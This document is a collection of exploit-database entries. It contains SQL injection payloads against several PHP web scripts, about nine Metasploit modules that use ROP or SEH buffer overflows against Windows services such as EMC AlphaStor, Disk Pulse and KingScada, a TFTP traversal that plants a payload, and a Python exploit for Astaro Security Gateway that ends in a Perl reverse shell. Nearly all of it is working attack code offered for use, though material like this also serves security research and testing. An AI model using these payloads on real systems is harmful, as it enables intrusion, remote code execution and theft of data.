# # # # #
# Exploit Title: Enterprise Edition Payment Processor Script 3.7 - SQL Injection
# Dork: N/A
# Date: 14.09.2017
# Vendor Homepage: https://www.goterhosting.com/
# Software Link: https://www.goterhosting.com/payment-processor-script.php
# Demo: http://www.enterprise-edition.gvmhosting.com/
# Version: 3.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject SQL commands.
#
# Proof of Concept:
#
#
# http://localhost/[PATH]/login
#
# User: 'or 1=1 or ''=' Pass: 'or 1=1 or ''='
#
# http://localhost/[PATH]/products?id=[SQL]&action=update
#
# -1++/*!00002UNION*/(/*!00002SELECT*/+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,/*!00002CONCAT_WS*/(0x203a20,USER(),DATABASE(),VERSION()))--+-&action=update
#
# http://localhost/[PATH]/bank?id=[SQL]&action=update
#
# Etc..
# # # # #
# # # # #
# Exploit Title: Adserver Script 5.6 - SQL Injection
# Dork: N/A
# Date: 14.09.2017
# Vendor Homepage: https://www.goterhosting.com/
# Software Link: https://www.goterhosting.com/adserverscript.php
# Demo: http://adserverscript.gvmhosting.com/
# Version: 5.6
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an advertiser to inject SQL commands.
#
# Proof of Concept:
#
# http://localhost/[PATH]/manage-target.php?id=[SQL]&wap=0
#
# 13-13'+/*!00008union*/+/*!00008select*/++/*!00008CONCAT_WS*/(0x203a20,USER(),DATABASE(),VERSION())--+-&wap=0
#
# Etc..
# # # # #
# # # # #
# Exploit Title: PTC KSV1 Script 1.7 - SQL Injection
# Dork: N/A
# Date: 14.09.2017
# Vendor Homepage: https://www.goterhosting.com/
# Software Link: https://www.goterhosting.com/ptc-ksv1.php
# Demo: http://www.ksv1demo.gvmhosting.com/
# Version: 1.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject SQL commands.
#
# Proof of Concept:
#
# http://localhost/[PATH]/gpt.php?v=entry&type=[SQL]&id=1&
#
# +'++aND(/*!00000sELeCT*/+0x30783331+/*!00000FrOM*/+(/*!00000SeLeCT*/+cOUNT(*),/*!00000CoNCaT*/((sELEcT(sELECT+/*!00000CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a) AND ''='&id=1&
#
# Etc..
# # # # #
# # # # #
# Exploit Title: Theater Management Script - SQL Injection
# Dork: N/A
# Date: 14.09.2017
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software Link: http://www.exclusivescript.com/product/8o2b4417538/php-scripts/theater-management-script
# Demo: http://198.38.86.159/~dineshkumarwork/demo/movie/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject SQL commands.
#
# Proof of Concept:
#
# http://localhost/[PATH]/show-time.php?moid=[SQL]
#
# -100'++/*!08888UNION*/(/*!08888SELECT*/0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329)--+-
#
# http://localhost/[PATH]/event-detail.php?eid=[SQL]
#
# http://localhost/[PATH]/trailer-detail.php?moid=[SQL]
#
# Etc..
# # # # #
# # # # #
# Exploit Title: Justdial Clone Script - SQL Injection
# Dork: N/A
# Date: 14.09.2017
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software Link: http://www.exclusivescript.com/product/z1mt4303451/php-scripts/justdial-clone-script
# Demo: http://74.124.215.220/~jusdil/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject SQL commands.
#
# Proof of Concept:
#
# http://localhost/[PATH]/restaurants-details.php?fid=[SQL]
#
# 46'++aND(/*!00000sELeCT*/+0x30783331+/*!00000FrOM*/+(/*!00000SeLeCT*/+cOUNT(*),/*!00000CoNCaT*/((sELEcT(sELECT+/*!00000CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a) AND ''='
#
# Etc..
# # # # #
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Mplayer SAMI Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow found in
SMPlayer 0.6.9 (Permanent DEP /AlwaysON). The overflow is
triggered during the parsing of an overly long string found
in a malicious SAMI subtitle file.
},
'License' => MSF_LICENSE,
'Author' => [ 'James Fitts' ],
'Version' => '$Revision: $',
'References' =>
[
[ 'BID', '49149' ],
[ 'OSVDB', '74604' ],
[ 'URL', 'http://www.saintcorporation.com/cgi-bin/exploit_info/mplayer_sami_subtitle_file_overflow' ],
[ 'URL', 'http://labs.mwrinfosecurity.com/assets/149/mwri_mplayer-sami-subtitles_2011-08-12.pdf' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'true',
},
'Payload' =>
{
'Space' => 700,
'BadChars' => "\x00\x0a\x0d\x3c\x7b",
'StackAdjustment' => -3500,
'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
'DisableNops' => 'True',
'EncoderOptions' =>
{
'BufferRegister' => 'ECX',
},
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP3 EN',
{
# pushad/ retn
# msvcrt.dll
'Ret' => 0x77c12df9,
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Jun 14 2011',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msfmsfa.smi']),
], self.class)
end
def make_nops(cnt)
return "\x41" * cnt
end
def exploit
# Chain 2 => kernel32!virtualalloc
# msvcrt.dll
gadgets = [
0x77c23e7a, # XOR EAX, EAX/ RETN
0x77c13ffd, # XCHG EAX, ECX/ RETN
0x77c2c84b, # MOV EBX, ECX/ MOV ECX, EAX/ MOV EAX, ESI/ POP ESI/ RETN 10
0x41414141,
0x77c127e5, # INC EBX/ RETN
0x41414141,
0x41414141,
0x41414141,
0x41414141,
0x77c3b860, # POP EAX/ RETN
0x41414141,
0x77c2d998, # POP ECX/ RETN
0x41413141,
0x77c47918, # SUB EAX, ECX/ RETN
0x77c58fbc, # XCHG EAX, EDX/ RETN
0x77c3b860, # POP EAX/ RETN
0x41414141,
0x77c2d998, # POP ECX/ RETN
0x41414101,
0x77c47918, # SUB EAX, ECX/ RETN
0x77c13ffd, # XCHG EAX, ECX/ RETN
0x77c53f3a, # POP EBP/ RETN
0x77c53f3a, # POP EBP/ RETN
0x77c39dd3, # POP EDI/ POP ESI/ RETN
0x77c39dd5, # ROP NOP
0x77c168cd, # JMP EAX
0x77c21d16, # POP EAX/ RETN
0x7c809af1, # kernel32!virtualalloc
0x77c12df9, # PUSHAD/ RETN
0x77c35524, # PUSH ESP/ RETN
].flatten.pack("V*")
p = make_nops(16) + payload.encoded
boom = pattern_create(979)
boom << [target.ret].pack('V')
boom[83, gadgets.length] = gadgets
boom[203, p.length] = p
# Chain 1 => Stack Pivot
boom[963, 4] = [0x41414101].pack('V') # Size
boom[967, 4] = [0x77c58fbc].pack('V') # XCHG EAX, EDX/ RETN => exec 2
boom[971, 4] = [0x77c59f6b].pack('V') # ADD DH, BL/ RETN => exec 1
boom[975, 4] = [0x77c15ed5].pack('V') # XCHG EAX, ESP/ RETN => exec 3
smi = %Q|<SAMI>
<BODY>
<SYNC Start=0>
#{rand_text_alpha_upper(40)}
#{boom}
</SAMI>|
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(smi)
end
end
__END__
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'EMC AlphaStor Library Manager Opcode 0x4f',
'Description' => %q{
This module exploits a stack based buffer overflow found in EMC
Alphastor Library Manager version < 4.0 build 910. The overflow
is triggered due to a lack of sanitization of the pointers used
for two strcpy functions.
},
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-14-029/' ],
[ 'CVE', '2013-0946' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'wfsdelay' => 1000
},
'Privileged' => true,
'Payload' =>
{
'Space' => 160,
'DisableNops' => 'true',
'BadChars' => "\x00\x09\x0a\x0d",
'StackAdjustment' => -404,
'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
'Compat' =>
{
'SymbolLookup' => 'ws2ord',
},
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows Server 2003 SP2 EN',
{
# msvcrt.dll
# add esp, 0c/ retn
'Ret' => 0x77bdda70,
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 13 2014'))
register_options(
[
Opt::RPORT(3500)
], self.class )
end
def exploit
connect
p = "\x90" * 8
p << payload.encoded
# msvcrt.dll
# 96 bytes
rop = [
0x77bb2563, # pop eax/ retn
0x77ba1114, # ptr to kernel32!virtualprotect
0x77bbf244, # mov eax, dword ptr [eax]/ pop ebp/ retn
0xfeedface,
0x77bb0c86, # xchg eax, esi/ retn
0x77bc9801, # pop ebp/ retn
0x77be2265,
0x77bb2563, # pop eax/ retn
0x03C0990F,
0x77bdd441, # sub eax, 3c0940fh/ retn
0x77bb48d3, # pop eax/ retn
0x77bf21e0,
0x77bbf102, # xchg eax, ebx/ add byte ptr [eax], al/ retn
0x77bbfc02, # pop ecx/ retn
0x77bef001,
0x77bd8c04, # pop edi/ retn
0x77bd8c05,
0x77bb2563, # pop eax/ retn
0x03c0984f,
0x77bdd441, # sub eax, 3c0940fh/ retn
0x77bb8285, # xchg eax, edx/ retn
0x77bb2563, # pop eax/ retn
0x90909090,
0x77be6591, # pushad/ add al, 0efh/ retn
].pack("V*")
buf = Rex::Text.pattern_create(514)
buf[0, 2] = "O~" # opcode
buf[13, 4] = [0x77bdf444].pack('V') # stack pivot 52
buf[25, 4] = [target.ret].pack('V') # stack pivot 12
buf[41, 4] = [0x77bdf444].pack('V') # stack pivot 52
buf[57, 4] = [0x01167e20].pack('V') # ptr
buf[69, rop.length] = rop
buf[165, 4] = [0x909073eb].pack('V') # jmp $+117
buf[278, 4] = [0x0116fd59].pack('V') # ptr
buf[282, p.length] = p
buf[512, 1] = "\x00"
# junk
buf << "AAAA"
buf << "BBBB"
buf << "CCCC"
buf << "DDDD"
print_status("Trying target %s..." % target.name)
sock.put(buf)
handler
disconnect
end
end
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'EMC AlphaStor Device Manager Opcode 0x72',
'Description' => %q{
This module exploits a stack based buffer overflow vulnerability
found in EMC Alphastor Device Manager. The overflow is triggered
when sending a specially crafted packet to the rrobotd.exe service
listening on port 3000. During the copying of strings to the stack
an unbounded sprintf() function overwrites the return pointer
leading to remote code execution.
},
'Author' => [ 'James Fitts' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
[ 'URL', '0day' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Privileged' => true,
'Payload' =>
{
'Space' => 160,
'DisableNops' => 'true',
'BadChars' => "\x00\x09\x0a\x0d",
'StackAdjustment' => -404,
'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
'Compat' =>
{
'ConnectionType' => '+ws2ord',
}
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows Server 2003 SP2 EN',
{
# pop eax/ retn
# msvcrt.dll
'Ret' => 0x77bc5d88,
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 14 2013'))
register_options(
[
Opt::RPORT(3000)
], self.class )
end
def exploit
connect
# msvcrt.dll
# 96 bytes
rop = [
0x77bb2563, # pop eax/ retn
0x77ba1114, # ptr to kernel32!virtualprotect
0x77bbf244, # mov eax, dword ptr [eax]/ pop ebp/ retn
0xfeedface,
0x77bb0c86, # xchg eax, esi/ retn
0x77bc9801, # pop ebp/ retn
0x77be2265,
0x77bb2563, # pop eax/ retn
0x03C0990F,
0x77bdd441, # sub eax, 3c0940fh/ retn
0x77bb48d3, # pop eax/ retn
0x77bf21e0,
0x77bbf102, # xchg eax, ebx/ add byte ptr [eax], al/ retn
0x77bbfc02, # pop ecx/ retn
0x77bef001,
0x77bd8c04, # pop edi/ retn
0x77bd8c05,
0x77bb2563, # pop eax/ retn
0x03c0984f,
0x77bdd441, # sub eax, 3c0940fh/ retn
0x77bb8285, # xchg eax, edx/ retn
0x77bb2563, # pop eax/ retn
0x90909090,
0x77be6591, # pushad/ add al, 0efh/ retn
].pack("V*")
buf = "\xcc" * 550
buf[246, 4] = [target.ret].pack('V')
buf[250, 4] = [0x77bf6f80].pack('V')
buf[254, rop.length] = rop
buf[350, payload.encoded.length] = payload.encoded
packet = "\x72#{buf}"
print_status("Trying target %s..." % target.name)
sock.put(packet)
handler
disconnect
end
end
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Lockstep Backup for Workgroups <= 4.0.3',
'Description' => %q{
This module exploits a stack buffer overflow found in
Lockstep Backup for Workgroups <= 4.0.3. The vulnerability
is triggered when sending a specially crafted packet that
will cause a login failure.
},
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
[ 'URL', 'http://secunia.com/advisories/50260/' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Privileged' => true,
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00",
'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
'EncoderOptions' =>
{
'BufferRegister' => 'ECX',
},
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows 2000 ALL EN',
{
# msvcrt.dll
# pop ecx/ pop ecx/ retn
'Ret' => 0x780146c0,
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 11 2013'))
register_options(
[
Opt::RPORT(2125),
OptString.new('USERNAME', [ true, 'Username of victim', 'msf' ])
], self.class )
end
def exploit
connect
uname = datastore['USERNAME']
p = "\x90" * 16
p << payload.encoded
packet = rand_text_alpha_upper(10000)
packet[0, 8] = "BFWCA\x01\x01\x00"
packet[8, uname.length] = "#{uname}\x00"
packet[73, p.length] = p
packet[7197, 4] = "\xeb\x06\x90\x90" # jmp $+8
packet[7201, 4] = [target.ret].pack('V')
packet[7205, 8] = "\x90" * 8
packet[7213, 2] = "\xff\xe7" # jmp edi
print_status("Trying target %s..." % target.name)
sock.put(packet)
handler
disconnect
end
end
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Disk Pulse Server \'GetServerInfo\' Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow vulnerability found
in libpal.dll of Disk Pulse Server v2.2.34. The overflow
is triggered when sending an overly long 'GetServerInfo'
request to the service listening on port 9120.
},
'Author' => [ 'James Fitts' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
[ 'BID', '43919' ],
[ 'URL', 'http://www.saintcorporation.com/cgi-bin/exploit_info/disk_pulse_getserverinfo' ],
[ 'URL', 'http://www.coresecurity.com/content/disk-pulse-server-getserverinfo-request-buffer-overflow-exploit-10-5' ]
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 300,
'BadChars' => "\x00\x0a\x0d\x20",
'DisableNops' => 'True',
'StackAdjustment' => -3500,
'Compat' =>
{
'SymbolLookup' => 'ws2ord',
}
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows XP SP3 EN',
{
# p/p/r
# libspp.dll
'Ret' => 0x1006f71f,
'Offset' => 303
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 19 2010'))
register_options([Opt::RPORT(9120)], self.class)
end
def exploit
connect
sploit = "GetServerInfo"
sploit << "\x41" * 8
sploit << payload.encoded
sploit << "\x42" * (303 - (8 + payload.encoded.length))
sploit << generate_seh_record(target.ret)
sploit << make_nops(4)
sploit << "\xe9\xc4\xfe\xff\xff" # jmp $-311
sploit << rand_text_alpha_upper(200)
print_status("Trying target #{target.name}...")
sock.put(sploit)
handler
disconnect
end
end
__END__
0033C05C 55 PUSH EBP
0033C05D 8B6C24 1C MOV EBP,DWORD PTR SS:[ESP+1C]
0033C061 3AC2 CMP AL,DL
0033C063 74 14 JE SHORT libpal.0033C079
0033C065 3C 0D CMP AL,0D
0033C067 74 10 JE SHORT libpal.0033C079
0033C069 3C 0A CMP AL,0A
0033C06B 74 0C JE SHORT libpal.0033C079
0033C06D 41 INC ECX
0033C06E 88042F MOV BYTE PTR DS:[EDI+EBP],AL
0033C071 47 INC EDI
0033C072 8A0431 MOV AL,BYTE PTR DS:[ECX+ESI]
0033C075 84C0 TEST AL,AL
0033C077 ^75 E8 JNZ SHORT libpal.0033C061
0033C079 C6042F 00 MOV BYTE PTR DS:[EDI+EBP],0
0033C07D 5D POP EBP
0033C07E 5F POP EDI
0033C07F 890B MOV DWORD PTR DS:[EBX],ECX
0033C081 5E POP ESI
0033C082 B8 01000000 MOV EAX,1
0033C087 5B POP EBX
0033C088 C3 RETN
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'haneWIN DNS Server Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow vulnerability found in
haneWIN DNS Server <= 1.5.3. The vulnerability is triggered
by sending an overly long packet to the victim server. A memcpy
function blindly copies user supplied data to a fixed size buffer
leading to remote code execution.
This module was tested against haneWIN DNS 1.5.3
},
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'EDB', '31260' ],
[ 'OSVDB', '102773' ]
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1000,
'DisableNops' => true,
'BadChars' => "\x00\x0a\x0d\x20",
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
},
'Platform' => 'win',
'DefaultTarget' => 0,
'Targets' =>
[
[
'Windows 2000 SP4 EN / haneWIN DNS 1.5.3',
{
# msvcrt.dll v6.10.9844.0
# pop esi/ pop edi/ retn
'Ret' => 0x78010394,
}
]
],
'DisclosureDate' => 'Jul 27 2013'))
register_options([Opt::RPORT(53)], self.class)
end
def exploit
connect
p = make_nops(32) + payload.encoded
buf = Rex::Text.pattern_create(5000)
buf[0, 2] = [0x4e20].pack('n') # length for malloc
buf[1332, p.length] = p
buf[2324, 8] = generate_seh_record(target.ret)
buf[2332, 15] = make_nops(10) + "\xe9\x13\xfc\xff\xff" # jmp $-1000
print_status("Sending malicious request...")
sock.put(buf)
disconnect
end
end
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'KingScada AlarmServer Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow found in
KingScada < 3.1.2.13. The vulnerability is triggered when
sending a specially crafted packet to the 'AlarmServer'
(AEserver.exe) service listening on port 12401. During the
parsing of the packet the 3rd dword is used as a size value
for a memcpy operation which leads to an overflown stack buffer
},
'Author' => [ 'James Fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2014-0787' ],
[ 'ZDI', '14-071' ],
[ 'URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-098-02' ]
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x0a\x0d\x20",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows XP SP3 EN / WellinTech KingScada 31.1.1.4',
{
# dbghelp.dll
# pop esi/ pop edi/ retn
'ret' => 0x02881fbf,
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Apr 10, 2014'))
register_options([Opt::RPORT(12401)], self.class)
end
def exploit
connect
p = payload.encoded
buf = make_nops(5000)
buf[0, 4] = [0x000004d2].pack('V')
buf[4, 4] = [0x0000007b].pack('V')
buf[8, 4] = [0x0000133c].pack('V') # size for memcpy()
buf[1128, p.length] = p
buf[2128, 8] = generate_seh_record(target['ret'])
buf[2136, 5] = "\xe9\x4b\xfb\xff\xff" # jmp $-1200
print_status("Trying target #{target.name}...")
sock.put(buf)
handler
disconnect
end
end
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Rex::Proto::TFTP
include Msf::Exploit::EXE
include Msf::Exploit::WbemExec
def initialize(info={})
super(update_info(info,
'Name' => "Cloudview NMS 2.00b Writable Directory Traversal Execution",
'Description' => %q{
This module exploits a vulnerability found in Cloudview NMS server. The
software contains a directory traversal vulnerability that allows a remote
attacker to write arbitrary file to the file system, which results in
code execution under the context 'SYSTEM'.
},
'License' => MSF_LICENSE,
'Author' => [ 'james fitts' ],
'References' =>
[
['URL', '0day']
],
'Payload' =>
{
'BadChars' => "\x00",
},
'DefaultOptions' =>
{
'ExitFunction' => "none"
},
'Platform' => 'win',
'Targets' =>
[
[ ' Cloudview NMS 2.00b on Windows', {} ]
],
'Privileged' => false,
'DisclosureDate' => "Oct 13 2014",
'DefaultTarget' => 0))
register_options([
OptInt.new('DEPTH', [ false, "Levels to reach base directory", 5 ]),
OptAddress.new('RHOST', [ true, "The remote TFTP server address" ]),
OptPort.new('RPORT', [ true, "The remote TFTP server port", 69 ])
], self.class)
end
def upload(filename, data)
tftp_client = Rex::Proto::TFTP::Client.new(
"LocalHost" => "0.0.0.0",
"LocalPort" => 1025 + rand(0xffff-1025),
"PeerHost" => datastore['RHOST'],
"PeerPort" => datastore['RPORT'],
"LocalFile" => "DATA:#{data}",
"RemoteFile" => filename,
"Mode" => "octet",
"Context" => {'Msf' => self.framework, "MsfExploit" => self },
"Action" => :upload
)
ret = tftp_client.send_write_request { |msg| print_status(msg) }
while not tftp_client.complete
select(nil, nil, nil, 1)
tftp_client.stop
end
end
def exploit
peer = "#{datastore['RHOST']}:#{datastore['RPORT']}"
exe_name = rand_text_alpha(rand(10)+5) + '.exe'
exe = generate_payload_exe
mof_name = rand_text_alpha(rand(10)+5) + '.mof'
mof = generate_mof(mof_name, exe_name)
depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']
levels = "../" * depth
print_status("#{peer} - Uploading executable (#{exe.length.to_s} bytes)")
upload("#{levels}WINDOWS\\system32\\#{exe_name}", exe)
select(nil, nil, nil, 1)
print_status("#{peer} - Uploading .mof...")
upload("#{levels}WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof)
end
end
#!/usr/bin/python
# Astaro Security Gateway v7 - Unauthenticated Remote Code Execution
# Exploit Authors: Jakub Palaczynski and Maciej Grabiec
# Tested on versions: 7.500 and 7.506
# Date: 13.12.2016
# Vendor Homepage: https://www.sophos.com/
# CVE: CVE-2017-6315
import socket
import sys
import os
import threading
import subprocess
import time
# print help or assign arguments
if len(sys.argv) != 3:
    sys.stderr.write("[-]Usage: python %s <our_ip> <remote_ip:port>\n" % sys.argv[0])
    sys.stderr.write("[-]Example: python %s 192.168.1.1 192.168.1.2:4444\n" % sys.argv[0])
    sys.exit(1)
lhost = sys.argv[1] # our ip address
rhost = sys.argv[2] # ip address and port of vulnerable ASG v7
# for additional thread to send requests in parallel
class requests (threading.Thread):
    def run(self):
        print 'Sending requests to trigger vulnerability.'
        time.sleep(5)
        # first request to clear cache
        os.system('curl -s -m 5 -X POST https://' + rhost + '/index.plx -d \'{"objs": [{"FID": "init"}],"backend_address": "' + lhost + ':81"}\' -k > /dev/null')
        # second request to trigger reverse connection
        os.system('curl -s -m 20 -X POST https://' + rhost + '/index.plx -d \'{"objs": [{"FID": "init"}],"backend_address": "' + lhost + ':80"}\' -k > /dev/null')
# function that creates socket
def create_socket(port):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(('0.0.0.0', port))
    sock.listen(10)
    conn, addr = sock.accept()
    return sock, conn, addr
# function to receive data from socket
def receive(conn):
    sys.stdout.write(conn.recv(1024))
    sys.stdout.flush()
    sys.stdout.write(conn.recv(1024))
    sys.stdout.flush()
# Thanks to Agarri: http://www.agarri.fr/docs/PoC_thaw_perl58.pl
# This script creates a serialized object that makes a reverse connection and executes everything it receives on a socket
file = """
#!/usr/bin/perl
use strict;
use MIME::Base64 qw( encode_base64 );
use Storable qw( nfreeze );
use LWP::UserAgent;
my $package_name = "A" x 252;
my $pack = qq~{ package $package_name; sub STORABLE_freeze { return 1; } }~;
eval($pack);
my $payload = qq~POSIX;eval('sleep(10);use IO::Socket::INET;\$r=IO::Socket::INET->new(\"""" + lhost + """:443");if (\$r) {eval(<\$r>);}');exit;~;
my $padding = length($package_name) - length($payload);
$payload = $payload . (";" x $padding);
my $data = bless { ignore => 'this' }, $package_name;
my $frozen = nfreeze($data);
$frozen =~ s/$package_name/$payload/g;
my $encodedSize = length($frozen);
my $pakiet = print(pack("N", $encodedSize), $frozen);
print "$frozen";
"""
# save file, run perl script and save our serialized payload
f = open("payload.pl", "w")
f.write(file)
f.close()
serialized = os.popen("perl ./payload.pl").read()
os.remove("./payload.pl")
# start thread that sends requests
thread = requests()
thread.start()
# open socket that receives connection from index
sock, conn, addr = create_socket(80)
print 'Received connection from: ' + addr[0] + ':' + str(addr[1]) + '.'
print 'Sending 1st stage payload.'
data = conn.recv(256)
# say hello to RPC client
conn.sendall(data)
data = conn.recv(256)
# send the serialized object that initiates the connect-back connection and executes everything it receives on a socket
conn.sendall(serialized)
sock.close()
# create second socket that receives connection from index and sends additional commands
sock, conn, addr = create_socket(443)
print 'Sending 2nd stage payload.'
# send commands that exploit confd (running with root permissions on localhost); the same exploitation as for the first stage
conn.sendall('sleep(10);use IO::Socket::INET;my $s = new IO::Socket::INET(PeerHost => "127.0.0.1",PeerPort => "4472",Proto => "tcp");$s->send("\\x00\\x00\\x00\\x1d\\x05\\x06\\x02\\x00\\x00\\x00\\x04\\x0a\\x04\\x70\\x72\\x70\\x63\\x0a\\x04\\x30\\x2e\\x30\\x31\\x0a\\x06\\x73\\x79\\x73\\x74\\x65\\x6d\\x0a\\x00");my $a;$s->recv($a,1024);$s->send("' + "\\x" + "\\x".join("{:02x}".format(ord(c)) for c in serialized) + '");$s->recv($a,1024);$s->close();\n')
sock.close()
# create socket that receives connection from confd and sends commands to get reverse shell
sock, conn, addr = create_socket(443)
print 'Sending 3rd stage payload.'
# send reverse shell payload
conn.sendall('sleep(20);use Socket;$i="' + lhost + '";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\n')
sock.close()
# create socket to receive shell with root permissions
print '\nNow you need to wait for shell.'
sock, conn, addr = create_socket(443)
receive(conn)
while True:
    cmd = raw_input("")
    if cmd == 'exit':
        break
    else:
        conn.send(cmd + "\n")
        receive(conn)
sock.close()
# Exploit Title: XYZ Auto Classifieds v1.0 - SQL Injection
# Date: 2017-09-12
# Exploit Author: 8bitsec
# Vendor Homepage: http://xyzscripts.com/
# Software Link: https://xyzscripts.com/php-scripts/xyz-auto-classifieds/details
